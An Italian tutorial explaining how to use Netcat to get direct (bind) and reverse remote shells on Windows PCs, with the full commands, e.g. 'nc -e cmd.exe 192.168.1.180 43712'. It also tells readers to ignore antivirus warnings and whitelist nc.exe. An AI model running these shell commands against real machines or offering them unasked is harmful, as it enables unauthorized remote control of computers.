www.MegaLab.it

Netcat è un piccolo programma open source scritto in C e disponibile per diversi sistemi operativi, con cui possiamo compiere numerose operazioni sulla rete, tanto da essere considerato un po' il "coltellino svizzero" degli amministratori di rete.

In questo articolo vedremo in particolare come sia possibile controllare da remoto la shell di un PC (qualunque siano i sistemi operativi utilizzati) e trasferire da e verso di esso file.

Scarichiamo ed installiamo Netcat

Chiaramente è necessario che su entrambi i PC sia installato Netcat.

Possiamo scaricare la versione per Windows da questo indirizzo. Tenete presente che le versioni per gli altri sistemi operativi sono perfettamente compatibili, quindi potrete prendere senza problemi il controllo di un sistema Linux da una postazione Windows, ad esempio.

Scaricate il file in una cartella ed estraetene il contenuto, copiate il file nc.exe nella cartella Windows o Windows\system32 in modo che sia sempre disponibile da qualsiasi cartella voi lo avviate. Questa operazione deve essere compiuta su entrambi i PC).

ATTENZIONE: Alcuni antivirus identificano nc.exe come Virus (Hacking Tool)... in effetti Netcat è utilizzato anche dagli Hacker e Cracker, proprio per la sua flessibilità e semplicità d'uso. Vi sono comunque molti scenario leciti d'utilizzo, e l'applicazione, di per sé, non espone ad alcun rischio di sicurezza: ignorate quindi eventuali avvisi, ed aggiungete Netcat alla lista della applicazioni fidate.

I metodi

Esistono due metodi per ottenere la shell remota:

• Il metodo "Diretto" (Direct Shell), in cui il nostro PC contatta il PC remoto, che è in attesa di connessioni su una determinata porta. In questo caso è importante che la macchina remota sia connessa attraverso un modem o che (nel caso utilizzi un router) sia impostato il Port Forwarding.

• Il metodo "Inverso" (Reverse Shell), in cui il nostro PC rimane in attesa di connessioni ed è il sistema remoto a connettersi a noi. In questo caso siamo noi a dover eventualmente impostare il nostro Router per effettuare il Port Forwarding.

In entrambi i casi, non dimenticate di consentire l'accesso alla porta in uso anche sul vostro firewall.

Il metodo "Direct Shell"

Preparazione della macchina che si vuole controllare: Aprite il prompt dei comandi selezionando Start->Esegui e scrivendo cmd

A questo punto digitate il comando nc -L -p 43712 -e cmd.exe -vv così facendo mettete Netcat in attesa di connessioni sulla porta 43712 (ma va bene qualunque altra porta, a patto che sia libera, ovviamente).

Sul vostro PC: Aprite anche qui il prompt dei comandi come prima, e digitate nc 192.168.1.180 43712, dove al posto di 192.168.1.180 ovviamente va l'indirizzo IP del sistema da controllare.

Entro qualche secondo dovrebbe comparirvi una schermata simile:

Ed ecco ottenuto il controllo del PC. Da qui, è possibile esplorare l'hard disk, avviare programmi, spegnere il PC e via dicendo.

Il metodo "Reverse Shell"

Preparazione del PC locale: Aprite il prompt dei comandi come precedentemente descritto e digitate il comando nc -l -p 43712 -vv in modo tale da mettere il vostro PC in attesa.

Sul PC remoto: Sempre nel prompt dei comandi eseguite il comando nc -e cmd.exe 192.168.1.180 43712

Le schermate che compariranno sono del tutto simili a quelle viste precedentemente.